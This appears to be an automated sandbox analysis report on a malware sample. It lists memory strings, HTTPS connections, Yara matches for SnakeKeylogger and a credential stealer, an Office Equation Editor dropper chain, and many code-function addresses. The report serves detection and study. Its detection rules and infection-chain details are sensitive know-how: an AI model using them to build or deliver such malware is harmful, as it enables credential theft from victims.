                Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034C2000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003468000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: swagodi78811.scr, 00000014.00000002.664602794.0000000003607000.00000004.00000800.00020000.00000000.sdmp, swagodi78811.scr, 00000014.00000002.664602794.000000000351B000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034AC000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.0000000003453000.00000004.00000800.00020000.00000000.sdmp, gRpkBp.exe, 0000001D.00000002.664487526.00000000034CF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49189
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
                Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49186
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49183
                Source: unknownNetwork traffic detected: HTTP traffic on port 49189 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49173
                Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 49203 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49198 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49173 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49203
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49202
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
                Source: unknownNetwork traffic detected: HTTP traffic on port 49183 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 49202 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49186 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49198
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49196
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49192
                Source: unknownNetwork traffic detected: HTTP traffic on port 49196 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49192 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.52.88:443 -> 192.168.2.22:49168 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49194 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49203 version: TLS 1.2

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.swagodi78811.scr.316cb90.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 20.2.swagodi78811.scr.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.swagodi78811.scr.3129570.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.swagodi78811.scr.316cb90.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.swagodi78811.scr.3129570.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000014.00000002.663140063.000000000042B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.412121084.0000000003129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: swagodi78811.scr PID: 3468, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: swagodi78811.scr PID: 3880, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F4A4ED3.doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\swagodi[1].doc, type: DROPPEDMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Microsoft Office drops suspicious files
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\swagodi.doc.urlJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\meridianresourcellc.top.urlJump to behavior
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\swagodi78811.scrJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\swagodi[1].scrJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\gRpkBp.exeMemory allocated: 770B0000 page execute and read and write
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_002804D810_2_002804D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_00289AB010_2_00289AB0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028D00010_2_0028D000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028D4E810_2_0028D4E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028C77410_2_0028C774
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028C79010_2_0028C790
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028CBC810_2_0028CBC8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 10_2_0028DE9010_2_0028DE90
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020392D20_2_0020392D
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_002031B120_2_002031B1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020E19020_2_0020E190
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_002069F020_2_002069F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00204A9F20_2_00204A9F
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020930020_2_00209300
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00208C2020_2_00208C20
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020348320_2_00203483
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_002044F020_2_002044F0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_002074C820_2_002074C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00204D6F20_2_00204D6F
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020854420_2_00208544
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00203E2820_2_00203E28
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00205E7020_2_00205E70
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00209E8820_2_00209E88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_002047D020_2_002047D0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020E83020_2_0020E830
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020E18020_2_0020E180
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020F18120_2_0020F181
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020D9F920_2_0020D9F9
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020DA0820_2_0020DA08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020FAB120_2_0020FAB1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020ECE820_2_0020ECE8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0020F61920_2_0020F619
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067F07820_2_0067F078
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006712A020_2_006712A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067874820_2_00678748
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067F06720_2_0067F067
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067206820_2_00672068
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067606820_2_00676068
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067607820_2_00676078
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067004020_2_00670040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067404020_2_00674040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067405020_2_00674050
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00677C0820_2_00677C08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00678C1020_2_00678C10
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006744E820_2_006744E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067A8C020_2_0067A8C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006790CA20_2_006790CA
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006704D820_2_006704D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006790D820_2_006790D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006744D820_2_006744D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006780A020_2_006780A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067C0A820_2_0067C0A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067A8B020_2_0067A8B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067D88020_2_0067D880
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067D89020_2_0067D890
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067809020_2_00678090
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067AD7720_2_0067AD77
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067097020_2_00670970
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067C57020_2_0067C570
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067497020_2_00674970
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067F54020_2_0067F540
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067DD4820_2_0067DD48
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067DD5820_2_0067DD58
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067650220_2_00676502
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067250020_2_00672500
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067651020_2_00676510
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067F9F720_2_0067F9F7
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006795A020_2_006795A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006769A820_2_006769A8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067498020_2_00674980
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067958F20_2_0067958F
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067AD8820_2_0067AD88
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067699A20_2_0067699A
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067299820_2_00672998
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00679A6820_2_00679A68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00676E4020_2_00676E40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067B24020_2_0067B240
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067B25020_2_0067B250
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00679A5820_2_00679A58
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067E22020_2_0067E220
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067CA3220_2_0067CA32
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00672E3020_2_00672E30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00676E3020_2_00676E30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067CA3820_2_0067CA38
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00670E0820_2_00670E08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067FA0820_2_0067FA08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00674E0820_2_00674E08
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067E21120_2_0067E211
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00674E1820_2_00674E18
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067E6E820_2_0067E6E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006732C820_2_006732C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006772C820_2_006772C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067E6DE20_2_0067E6DE
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006772D820_2_006772D8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006752A020_2_006752A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006752B020_2_006752B0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006732BA20_2_006732BA
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067129120_2_00671291
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067776120_2_00677761
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067376020_2_00673760
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067777020_2_00677770
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067574820_2_00675748
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067375020_2_00673750
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00679F2620_2_00679F26
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00679F3020_2_00679F30
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067873920_2_00678739
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067173820_2_00671738
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067573820_2_00675738
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067B70720_2_0067B707
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067CF0020_2_0067CF00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067B71820_2_0067B718
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00675BE020_2_00675BE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067BBE020_2_0067BBE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00673BE920_2_00673BE9
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067A3E820_2_0067A3E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00678BFF20_2_00678BFF
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00673BF820_2_00673BF8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067A3F820_2_0067A3F8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00677BF820_2_00677BF8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00671BC120_2_00671BC1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067D3C820_2_0067D3C8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00675BD120_2_00675BD1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_00671BD020_2_00671BD0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067EBA120_2_0067EBA1
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067EBB020_2_0067EBB0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_0067D3B820_2_0067D3B8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C1C6020_2_006C1C60
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C4E6020_2_006C4E60
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C806020_2_006C8060
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C004020_2_006C0040
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C324020_2_006C3240
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C644020_2_006C6440
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C964020_2_006C9640
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C162020_2_006C1620
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C482020_2_006C4820
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C7A2020_2_006C7A20
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C963020_2_006C9630
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C2C0020_2_006C2C00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C5E0020_2_006C5E00
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C900020_2_006C9000
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C28E020_2_006C28E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C5AE020_2_006C5AE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C8CE020_2_006C8CE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C0CC020_2_006C0CC0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C3EC020_2_006C3EC0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C70C020_2_006C70C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C22A020_2_006C22A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C54A020_2_006C54A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C86A020_2_006C86A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C068020_2_006C0680
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C388020_2_006C3880
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C6A8020_2_006C6A80
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C036020_2_006C0360
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C356020_2_006C3560
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C676020_2_006C6760
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C517120_2_006C5171
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C194020_2_006C1940
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C4B4020_2_006C4B40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C7D4020_2_006C7D40
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C995020_2_006C9950
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C2F2020_2_006C2F20
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C612020_2_006C6120
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C932020_2_006C9320
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C130020_2_006C1300
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C450020_2_006C4500
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C770020_2_006C7700
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C0FE020_2_006C0FE0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C41E020_2_006C41E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C73E020_2_006C73E0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C0FCF20_2_006C0FCF
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C25C020_2_006C25C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C57C020_2_006C57C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C89C020_2_006C89C0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C09A020_2_006C09A0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C3BA020_2_006C3BA0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C6DA020_2_006C6DA0
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C1F8020_2_006C1F80
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C518020_2_006C5180
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C838020_2_006C8380
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006C3B9020_2_006C3B90
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DA5E820_2_006DA5E8
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DB26820_2_006DB268
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006D3E6820_2_006D3E68
                Source: C:\Users\user\AppData\Roaming\swagodi78811.scrCode function: 20_2_006DE46820_2_006DE468
